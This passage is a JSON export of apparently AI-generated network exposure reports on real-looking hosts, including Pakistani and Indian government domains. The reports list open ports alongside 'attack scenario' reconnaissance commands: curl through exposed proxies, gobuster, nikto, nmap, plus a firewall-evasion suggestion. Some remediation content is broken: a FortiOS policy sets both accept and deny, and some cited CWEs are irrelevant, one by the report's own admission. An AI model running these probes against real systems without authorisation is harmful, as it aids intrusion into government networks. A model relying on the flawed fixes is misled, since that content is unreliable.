pivot points for further lateral movement within the network.\n\n**Business Impact** \nUnnecessary exposure of services increases risk of exploitation, especially if default credentials or known vulnerabilities exist. It also provides attackers additional entry vectors into the organization’s infrastructure.\n\n**Remediation** \nEnsure only required ports are publicly accessible. If this port serves no external purpose, restrict access at the firewall level. Review whether FortiGuard Web Filtering requires public accessibility; typically, these services should be internal or behind authentication.\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8015/tcp is open on the IP address `124.109.52.82`. Identified via Naabu, this port was later confirmed by Nmap to host an HTTP proxy service branded as FortiGuard Web Filtering. Exposed proxy servers can pose significant risks if improperly configured, including allowing bypassing of content filtering policies or acting as intermediaries for malicious traffic.\n\n**Attack Scenario (Proof of Concept)** \nThe attacker uses `curl` or similar tools to test connectivity through the proxy:\n\n```bash\ncurl --proxy http://124.109.52.82:8015 http://example.com/\n```\n\nIf successful, they might use it to mask their origin or bypass local restrictions.\n\n**Business Impact** \nPublicly exposed proxy endpoints can lead to abuse for anonymizing attacks, exfiltration of sensitive data, or circumvention of corporate web filters—potentially leading to compliance violations or compromise.\n\n**Remediation** \nRestrict access to this port unless absolutely necessary for business operations. Ensure strong authentication mechanisms are enforced if public exposure is required. Apply vendor-specific hardening guidelines from Fortinet regarding FortiGuard deployments.\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8008/tcp is open on the IP address `124.109.52.82`. Scanned using Naabu, this port was later identified by Nmap as hosting an HTTP service. Alternate HTTP ports often indicate non-standard configurations which may lack standard protections such as WAFs or hardened server settings.\n\n**Attack Scenario (Proof of Concept)** \nUsing `curl` or browser-based testing:\n\n```bash\ncurl http://124.109.52.82:8008/\n```\n\nThis reveals information about backend systems or applications potentially less protected than those on standard ports.\n\n**Business Impact** \nExposing alternative HTTP ports without adequate protection increases the likelihood of successful reconnaissance and exploitation attempts against underprotected services.\n\n**Remediation** \nAudit all non-standard HTTP(S) ports for necessity. Implement consistent security controls across all listening web interfaces. Where possible, redirect or disable alternate ports unless explicitly needed.\n\n---\n\n### Open Port 80/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nStandard HTTP port 80/tcp is open on the asset `124.109.52.82`, associated with the domain ep.gov.pk. Identified via Masscan, this represents typical web server behavior but still contributes to overall network footprint visibility.\n\n**Attack Scenario (Proof of Concept)** \nA basic HTTP GET request confirms availability:\n\n```bash\ncurl http://124.109.52.82/\n```\n\nFurther enumeration could involve directory brute-forcing or fingerprinting techniques to identify underlying technologies.\n\n**Business Impact** \nWhile expected for websites, unencrypted HTTP remains vulnerable to man-in-the-middle interception and should ideally redirect to HTTPS.\n\n**Remediation** \nImplement automatic redirection from HTTP to HTTPS. Enforce HSTS headers where appropriate. Monitor logs for suspicious activity targeting plaintext communication channels.\n\n---\n\n### Open Port 443/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nSecure HTTPS port 443/tcp is open on `124.109.52.82`. Identified via Masscan, this is essential for encrypted communications. However, Nmap classified the service as “tcpwrapped,” indicating potential wrapping or filtering logic applied before reaching the actual TLS endpoint.\n\n**Attack Scenario (Proof of Concept)** \nUse OpenSSL to inspect certificate details:\n\n```bash\nopenssl s_client -connect 124.109.52.82:443\n```\n\nCheck for weak cipher suites, expired certificates, or improper SSL/TLS configurations.\n\n**Business Impact** \nImproper TLS setup can expose users to eavesdropping, downgrade attacks, or trust issues undermining secure transactions.\n\n**Remediation** \nEnsure valid, up-to-date certificates are used. Disable outdated protocols (SSLv2/v3). Employ modern cipher suites aligned with industry best practices (e.g., TLS 1.2+).\n\n---\n\n### Open Port 80/tcp (http) — Microsoft-HTTPAPI/2.0\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nNmap identifies that port 80 hosts an HTTP service powered by Microsoft HTTP API version 2.0 (`Microsoft-HTTPAPI/2.0`). This usually indicates a lightweight embedded web server component rather than full IIS deployment, commonly seen in .NET self-hosted applications or administrative interfaces.\n\n**Attack Scenario (Proof of Concept)** \nEnumerate directories or endpoints using Burp Suite or `gobuster`:\n\n```bash\ngobuster dir -u http://ep.gov.pk -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt\n```\n\nLook for hidden APIs or debug pages exposing sensitive functionality.\n\n**Business Impact** \nMisconfigured embedded HTTP servers can leak internal paths, expose debugging features, or provide unintended access to application internals.\n\n**Remediation** \nReview application codebase for unnecessary exposure of development endpoints. Restrict access based on role-based authorization. Regularly audit exposed routes for unintended disclosure.\n\n---\n\n### Open Port 443/tcp (tcpwrapped)\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 443/tcp appears open but returns a “tcpwrapped” response when scanned with Nmap. This suggests that some form of middleware (such as xinetd or stunnel) intercepts connections prior to reaching the final destination service. Such wrappers obscure true service identity and complicate vulnerability assessments.\n\n**Attack Scenario (Proof of Concept)** \nAttempt direct connection using OpenSSL:\n\n```bash\nopenssl s_client -connect ep.gov.pk:443\n```\n\nIf wrapped incorrectly, unexpected responses or timeouts may occur, revealing wrapper presence or misconfiguration.\n\n**Business Impact** \nObscured service identification hinders both legitimate monitoring and incident response efforts while potentially masking insecure configurations beneath the wrapper layer.\n\n**Remediation** \nVerify integrity and configuration of any TCP wrapping layers. Ensure encryption termination occurs securely and logging/tracing capabilities remain intact despite obfuscation.\n\n---\n\n### Open Port 8008/tcp (http)\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nAnother instance of an HTTP listener found on port 8008/tcp for the domain `ep.gov.pk`. As previously noted, alternate HTTP ports require careful scrutiny due to reduced likelihood of robust security implementation compared to primary web services.\n\n**Attack Scenario (Proof of Concept)** \nInitiate probing with `nikto` or manual inspection:\n\n```bash\nnikto -h http://ep.gov.pk:8008\n```\n\nIdentify banners, error messages, or default landing pages indicative of development/test environments.\n\n**Business Impact** \nAlternate HTTP listeners may serve outdated software versions or contain debugging artifacts, increasing susceptibility to exploitation.\n\n**Remediation** \nConduct regular audits of all active ports. Remove or restrict access to non-production services. Apply uniform patch management and hardening procedures across all listening HTTP instances.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 8015/tcp exposes an HTTP proxy service labeled as FortiGuard Web Filtering. These appliances are designed to filter internet-bound traffic but exposing them externally introduces risk of misuse or unauthorized access.\n\n**Attack Scenario (Proof of Concept)** \nTest proxy functionality:\n\n```bash\ncurl --proxy http://ep.gov.pk:8015 http://ifconfig.me/ip\n```\n\nSuccessful execution would confirm ability to route arbitrary requests through the proxy.\n\n**Business Impact** \nExposed filtering proxies can be abused for anonymization, evasion of policy enforcement, or relaying malicious traffic originating from trusted domains.\n\n**Remediation** \nLimit access to this port strictly to authorized internal networks. Audit proxy rules regularly. Enable authentication and logging for all proxy activities.\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nSimilar to port 8015, port 8020/tcp runs another instance of FortiGuard Web Filtering configured as an HTTP proxy. Multiple proxy instances suggest complex routing or redundancy strategies, each expanding the organization's attack surface.\n\n**Attack Scenario (Proof of Concept)** \nRepeat earlier proxy tests:\n\n```bash\ncurl --proxy http://ep.gov.pk:8020 http://ifconfig.me/ip\n```\n\nDetermine if different filtering rules or access levels apply between proxy instances.\n\n**Business Impact** \nMultiple exposed proxy endpoints multiply opportunities for abuse, particularly if inconsistent policies govern each one.\n\n**Remediation** \nConsolidate proxy usage wherever feasible. Standardize access control and filtering rules. Continuously monitor proxy logs for anomalies or signs of abuse.","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a11b8315fc497eb9914e08b"},"created_at":{"$date":"2026-05-23T14:22:41.819Z"},"url":"https://uppolice.gov.in/","tool":"generate_network_exposure_report","result":{"url":"https://uppolice.gov.in/","category":"network_exposure","timestamp":"2026-05-23T14:22:41.812953+00:00","report":"### [No Open Ports Found / uppolice.gov.in / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nThis finding indicates that during scanning, no open TCP or UDP ports were identified on the host `uppolice.gov.in`. This may suggest either:\n- The system is not actively listening for incoming connections.\n- A firewall or filtering mechanism is blocking all scanned ports.\n- The system was offline or unreachable at the time of scan.\n\nThe tool used to detect this condition was `naabu`, which performs fast port scans using SYN scanning techniques by default.\n\nIt should be noted that while no open ports were detected, this does not necessarily indicate a secure configuration; it simply means no services were exposed during the scan window.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker attempting to fingerprint available services might use tools such as `nmap` or `masscan` to enumerate open ports:\n\n```bash\nnmap -p- uppolice.gov.in\n```\n\nIf no ports respond, the attacker may attempt to:\n- Scan from different geographic locations or IP ranges.\n- Use fragmented packets or timing evasion techniques (`--defeat-rst-ratelimit`) to bypass simple firewalls.\n- Perform service-specific scans targeting common web/application ports like 80, 443, 8080, etc.\n\nIn some cases, stealthier reconnaissance methods (e.g., ICMP-based discovery or passive DNS enumeration) can still yield useful intelligence even when active port scanning fails.\n\n**Business Impact**\n\nWhile having no open ports reduces direct exposure to remote exploitation, it also implies limited accessibility for legitimate users or systems. If intended services are unreachable due to misconfigured firewalls or network policies, business operations relying on those endpoints will suffer downtime or degraded performance.\n\nAdditionally, overly restrictive configurations without proper monitoring can mask underlying issues such as accidental service shutdowns or infrastructure outages.\n\n**Remediation**\n\nEnsure that necessary services are accessible only to authorized entities via appropriate access control lists (ACLs), firewalls, and segmentation strategies.\n\nWhere applicable:\n- Review firewall rules to ensure they align with operational requirements.\n- Implement logging and alerting mechanisms to detect unintended service unavailability.\n- Conduct periodic connectivity tests to validate availability of critical services.\n\n---\n\n### [Open Port 443/tcp Detected / 208.91.112.55 / tcp/443]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**\n\nPort 443/tcp is commonly associated with HTTPS traffic, indicating that an SSL/TLS-enabled HTTP server is running on this address. During the masscan operation, this port was observed to be open and responsive.\n\nThis suggests that there is likely a web application or reverse proxy serving content over encrypted channels on this endpoint. However, further analysis would be required to determine the nature of the hosted service, its version, and potential vulnerabilities.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker could begin interacting with the service using standard tools:\n\n```bash\ncurl -v https://208.91.112.55\n```\n\nThey may then proceed with:\n- Certificate inspection to gather domain names and issuer information.\n- Directory brute-forcing using tools like `gobuster`.\n- Vulnerability scanning with tools such as `nikto` or `testssl.sh`.\n\nExample directory enumeration command:\n```bash\ngobuster dir -u https://208.91.112.55 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n```\n\nIf weak TLS configurations exist, attackers may exploit known cipher suites or protocol downgrade attacks.\n\n**Business Impact**\n\nExposing HTTPS services increases the attack surface but is often necessary for public-facing applications. Misconfigurations in SSL/TLS settings or outdated software versions can lead to man-in-the-middle attacks, credential theft, or compliance violations under standards such as PCI-DSS or HIPAA.\n\n**Remediation**\n\nEnsure that:\n- Only strong encryption protocols (TLS 1.2+) are enabled.\n- Weak ciphers and deprecated algorithms are disabled.\n- Certificates are valid, properly configured, and renewed automatically.\n- Access logs are monitored for suspicious activity.\n\nUse tools like Mozilla's SSL Configuration Generator to harden TLS stacks.\n\nReference: [OWASP Transport Layer Protection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html)\n\n---\n\n### [Open Port 80/tcp Detected / 208.91.112.55 / tcp/80]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**\n\nPort 80/tcp corresponds to plain-text HTTP communication. Its presence indicates that a web server is accepting unencrypted requests on this interface. While convenient for legacy compatibility or internal use, exposing HTTP services publicly poses significant risks unless explicitly protected by intermediaries such as load balancers or WAFs.\n\nThis finding was detected using `masscan`.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker can interact directly with the HTTP service:\n\n```bash\ncurl http://208.91.112.55/\n```\n\nThey may perform actions including:\n- Enumerating directories and files.\n- Attempting login brute-force against exposed interfaces.\n- Exploiting insecure headers or missing security controls.\n\nSample header inspection:\n```bash\ncurl -I http://208.91.112.55/\n```\n\nWithout HTTPS enforcement, sensitive data transmitted over this channel (such as credentials or session tokens) can be intercepted by adversaries on shared networks.\n\n**Business Impact**\n\nUnsecured HTTP services expose organizations to eavesdropping, session hijacking, and injection attacks. Additionally, many modern browsers flag non-HTTPS sites as “not secure,” potentially damaging user trust and brand reputation.\n\nRegulatory frameworks such as GDPR emphasize protecting personal data in transit, making plaintext HTTP a liability.\n\n**Remediation**\n\nImplement the following measures:\n- Redirect all HTTP traffic to HTTPS using permanent redirects (HTTP 301).\n- Enforce HSTS (HTTP Strict Transport Security) headers.\n- Disable unnecessary cleartext HTTP listeners where possible.\n\nApache example redirect rule:\n```apache\n\n ServerName example.com\n Redirect permanent / https://example.com/\n\n```\n\nCWE-319: Cleartext Transmission of Sensitive Information \n[OWASP A02:2021 – Cryptographic Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n\n---\n\n### [Open Port 443/tcp (HTTPS) / uppolice.gov.in / tcp/443]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nPort 443/tcp is confirmed as open and hosts an HTTPS service on the domain `uppolice.gov.in`. This represents the primary entry point for secure communications with the website. It supports encrypted browsing sessions essential for transmitting confidential data between clients and servers.\n\nIdentified via `nmap_scan`, this port typically serves web pages, APIs, or administrative panels depending on backend architecture.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker initiates interaction with the HTTPS service:\n\n```bash\ncurl -v https://uppolice.gov.in\n```\n\nThey may then:\n- Analyze response headers for security indicators (X-Frame-Options, CSP, etc.)\n- Test for certificate validity and expiration dates.\n- Probe for known vulnerabilities in the web stack (e.g., Apache/Nginx versions).\n\nUsing `testssl.sh`:\n```bash\ntestssl.sh https://uppolice.gov.in\n```\n\nMisconfigured SSL parameters or outdated components increase susceptibility to exploits such as BEAST, POODLE, or Heartbleed.\n\n**Business Impact**\n\nAs the main public-facing interface, any compromise here could result in full site defacement, unauthorized access to databases, or impersonation of law enforcement personnel—particularly concerning given the `.gov.in` TLD.\n\nCompliance failures related to encryption standards may incur legal penalties or audit findings.\n\n**Remediation**\n\nApply best practices for securing HTTPS deployments:\n- Enable Perfect Forward Secrecy (PFS).\n- Remove support for obsolete protocols (SSLv2/SSLv3).\n- Regularly update certificates and underlying software stacks.\n\nNginx sample TLS configuration:\n```nginx\nssl_protocols TLSv1.2 TLSv1.3;\nssl_ciphers HIGH:!aNULL:!MD5;\nssl_prefer_server_ciphers on;\n```\n\nCWE-297: Improper Validation of Certificate with Host Mismatch \n[OWASP A07:2021 – Identification and Authentication Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n\n---\n\n### [Open Port 8008/tcp (HTTP) / uppolice.gov.in / tcp/8008]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nPort 8008/tcp is identified as hosting an HTTP service. Unlike standard ports 80 or 443, this alternative port may serve development environments, internal dashboards, or auxiliary services not meant for general public consumption.\n\nIts exposure raises concerns about unintended accessibility and lack of authentication or authorization controls.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker probes the alternate port:\n\n```bash\ncurl http://uppolice.gov.in:8008/\n```\n\nThey may discover:\n- Debugging interfaces or API endpoints.\n- Administrative panels lacking login protection.\n- Internal metrics or status pages revealing infrastructure details.\n\nTools like Burp Suite or ZAP can automate probing of such endpoints for hidden functionality.\n\n**Business Impact**\n\nUnauthorized access to internal services exposes sensitive operational data, facilitates lateral movement within the network, and undermines perimeter defenses. Even seemingly benign debug pages can leak stack traces, environment variables, or database connection strings.\n\n**Remediation**\n\nRestrict access to non-standard ports using:\n- Firewall ACLs limiting source IPs.\n- Reverse proxies enforcing authentication before reaching backend services.\n- Removal of unnecessary listeners entirely.\n\nExample iptables rule:\n```bash\niptables -A INPUT -p tcp --dport 8008 -j DROP\n```\n\nAlternatively, bind services to localhost only:\n```ini\nbind_address = 127.0.0.1\n```\n\nCWE-1190: Daemon Uses Unprotected Communication Channel \n[OWASP A01:2021 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n\n---\n\n### [Open Port 8015/tcp (HTTP Proxy – FortiGuard Web Filtering) / uppolice.gov.in / tcp/8015]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nPort 8015/tcp is identified as running an HTTP proxy service branded as Fortinet’s FortiGuard Web Filtering solution. These appliances act as intermediaries for outbound web traffic, applying filtering rules based on threat intelligence feeds.\n\nHowever, exposing such a device externally introduces risk if improperly configured, especially if it allows unrestricted proxy usage or lacks authentication.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker attempts to route traffic through the proxy:\n\n```bash\ncurl --proxy http://uppolice.gov.in:8015 http://target-site.com\n```\n\nIf successful, they gain anonymized internet access routed through your organization’s infrastructure, potentially masking malicious behavior or violating acceptable use policies.\n\nAdditionally, misconfigured proxies may allow tunneling protocols or bypass filtering logic altogether.\n\n**Business Impact**\n\nImproperly secured proxies enable abuse scenarios including:\n- Circumvention of corporate web filters.\n- Concealment of malicious activities behind trusted IP addresses.\n- Bandwidth misuse leading to increased costs or degraded performance.\n\nLegal ramifications arise if third-party actors conduct illegal activities using compromised proxy infrastructure.\n\n**Remediation**\n\nSecure proxy deployments require:\n- Strong authentication mechanisms (LDAP/RADIUS integration).\n- Explicit deny-all policies except for designated roles.\n- Logging and monitoring of proxy transactions.\n\nFortiOS CLI example:\n```fortios\nconfig firewall proxy-policy\n edit 1\n set action accept\n set srcintf \"internal\"\n set dstintf \"external\"\n set srcaddr \"all\"\n set dstaddr \"all\"\n set schedule \"always\"\n set service \"webfilter\"\n set action deny\n next\nend\n```\n\nCWE-441: Unintended Proxy or Intermediary ('Confused Deputy') \n[OWASP A05:2021 – Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)\n\n---\n\n### [Open Port 8020/tcp (HTTP Proxy – FortiGuard Web Filtering) / uppolice.gov.in / tcp/8020]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | network_exposure |\n| Asset / URL | uppolice.gov.in |\n\n**Description**\n\nSimilar to port 8015, port 8020/tcp runs another instance of Fortinet’s FortiGuard Web Filtering proxy. Multiple proxy instances may indicate redundancy, load balancing, or segmented policy enforcement across departments or zones.\n\nHowever, each additional listener expands the attack surface and requires independent validation for correct deployment and access restrictions.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker repeats earlier proxy testing procedures:\n\n```bash\ncurl --proxy http://uppolice.gov.in:8020 http://target-site.com\n```\n\nThey may find differences in filtering behavior, authentication requirements, or routing capabilities compared to other proxy ports.\n\nAutomated scanners like `proxychains` combined with custom scripts can systematically test multiple proxy endpoints simultaneously.\n\n**Business Impact**\n\nEach exposed proxy increases complexity and likelihood of misconfiguration. Inconsistent policies across proxies may create gaps exploitable by adversaries seeking unfettered internet access or evasion opportunities.\n\nOrganizations face reputational harm and regulatory scrutiny if their infrastructure becomes complicit in cybercrime.\n\n**Remediation**\n\nConsolidate proxy configurations and enforce centralized management:\n- Standardize filtering profiles and access policies.\n- Audit and remove redundant or unused proxy listeners.\n- Monitor logs for anomalous proxy usage patterns.\n\nFortiOS GUI recommendation:\nNavigate to **Security Profiles > Web Filter**, review assigned policies per interface, and disable unused ones.\n\nCWE-1007: Insufficient Visual Distinction of Homograph Characters (Not directly relevant but highlights importance of clear labeling and distinction among similar assets.)\n\n[OWASP A05:2021 – Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)","summary":{"total":7}},"summary":{"total":7}},{"_id":{"$oid":"6a13749f11563b5a758d079e"},"created_at":{"$date":"2026-05-24T21:58:55.255Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-24T21:58:55.250782+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a13e2cdd7f9ee4baa997ca0"},"created_at":{"$date":"2026-05-25T05:49:01.194Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T05:49:01.186976+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a13e65c884a4427a78749ce"},"created_at":{"$date":"2026-05-25T06:04:12.159Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T06:04:12.149082+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a141bfbd5f7dfbdb953ff76"},"created_at":{"$date":"2026-05-25T09:52:59.623Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T09:52:59.616286+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a141d52fe8e0c2132d82e5b"},"created_at":{"$date":"2026-05-25T09:58:42.871Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_network_exposure_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"network_exposure","timestamp":"2026-05-25T09:58:42.864315+00:00","report":"### Open Port 8020/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description** \nPort 8020/tcp is open on the host 64.29.17.67. This port is commonly associated with HTTP proxy services or custom web applications. Its exposure indicates that a service is actively listening on this port and may respond to incoming TCP connections. While not inherently insecure, open non-standard ports increase the attack surface by providing additional entry points for reconnaissance or exploitation if the underlying service is misconfigured or vulnerable.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker performs a port scan using tools like `nmap` or `masscan`, identifying that port 8020 is open. They then attempt to connect via HTTP:\n\n```bash\ncurl -v http://64.29.17.67:8020/\n```\n\nIf the response reveals headers indicating a known software version or configuration details, the attacker can proceed with targeted exploits. If it's a proxy, they might try to abuse it for anonymization or internal scanning.\n\n**Business Impact** \nExposing unnecessary ports increases the organization’s attack surface without clear business justification. It may lead to unauthorized access if the service behind the port has vulnerabilities or weak authentication mechanisms. Additionally, automated scanners and threat actors often target such ports during initial reconnaissance phases.\n\n---\n\n### Open Port 8015/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description** \nPort 8015/tcp is open on the IP address 64.29.17.67. This port typically hosts HTTP-based services or proxies. The presence of an open port suggests that a service is running and accessible over the network. Without further context about the nature of the service, this represents a potential vector for information disclosure or exploitation depending on the implementation.\n\n**Attack Scenario (Proof of Concept)** \nThe attacker initiates a connection to the exposed port:\n\n```bash\nnc -zv 64.29.17.67 8015\n```\n\nThey follow up with an HTTP GET request to probe for banners or error pages:\n\n```bash\nGET / HTTP/1.1\nHost: 64.29.17.67:8015\n```\n\nResponses revealing server type, version, or directory listings provide clues for crafting more advanced attacks.\n\n**Business Impact** \nUnnecessary exposure of ports increases risk of compromise due to unmonitored or outdated services. Even if benign, these endpoints consume resources and complicate network monitoring efforts.\n\n---\n\n### Open Port 443/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description** \nPort 443/tcp is open on 64.29.17.67, which is standard for HTTPS traffic. This implies that a secure web server is operational at this endpoint. However, the mere availability of the port does not indicate whether TLS configurations are secure or if there are vulnerabilities within the hosted application layer.\n\n**Attack Scenario (Proof of Concept)** \nUsing OpenSSL, an attacker inspects the SSL/TLS certificate:\n\n```bash\nopenssl s_client -connect 64.29.17.67:443\n```\n\nThey check for weak cipher suites or expired certificates. Alternatively, they perform enumeration:\n\n```bash\nnmap --script ssl-enum-ciphers -p443 64.29.17.67\n```\n\nThis helps determine if cryptographic weaknesses exist that could be leveraged in man-in-the-middle scenarios.\n\n**Business Impact** \nWhile essential for encrypted communication, improperly configured HTTPS services can expose organizations to protocol downgrade attacks, data interception, or compliance violations under regulations such as PCI-DSS or GDPR.\n\n---\n\n### Open Port 80/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description** \nPort 80/tcp is open on 64.29.17.67, indicating that an HTTP service is available. This is typical for web servers but also presents risks when used alongside HTTPS unless properly redirected. Misconfigurations here can leak sensitive information or allow attackers to bypass encryption.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker sends a basic HTTP request:\n\n```bash\ncurl -I http://64.29.17.67/\n```\n\nThey look for redirects to HTTPS, presence of cookies without Secure flags, or leakage of internal paths. In some cases, cleartext credentials or session tokens may be transmitted inadvertently.\n\n**Business Impact** \nFailure to enforce HTTPS across all endpoints leaves users susceptible to eavesdropping and credential theft. Organizations may face reputational harm or regulatory sanctions if user data is compromised through insecure transmission methods.\n\n---\n\n### Open Port 8008/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description** \nPort 8008/tcp is open on 64.29.17.67. This port is occasionally used for alternative HTTP services or development environments. Its exposure should be reviewed to ensure it aligns with intended use and does not introduce unintended access vectors.\n\n**Attack Scenario (Proof of Concept)** \nThe attacker probes the service:\n\n```bash\ncurl http://64.29.17.67:8008/\n```\n\nThey analyze responses for debug output, stack traces, or administrative interfaces that should not be publicly accessible. Such findings can aid lateral movement or privilege escalation.\n\n**Business Impact** \nDevelopment or test services exposed to production networks pose significant risks, including accidental exposure of source code, debugging features, or backdoor functionality.\n\n---\n\n### Open Port 80/tcp on 64.29.17.3\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.3 |\n\n**Description** \nPort 80/tcp is open on 64.29.17.3, suggesting that an HTTP service is active. As with other instances, this port should ideally redirect to HTTPS or have strong protections against insecure communications.\n\n**Attack 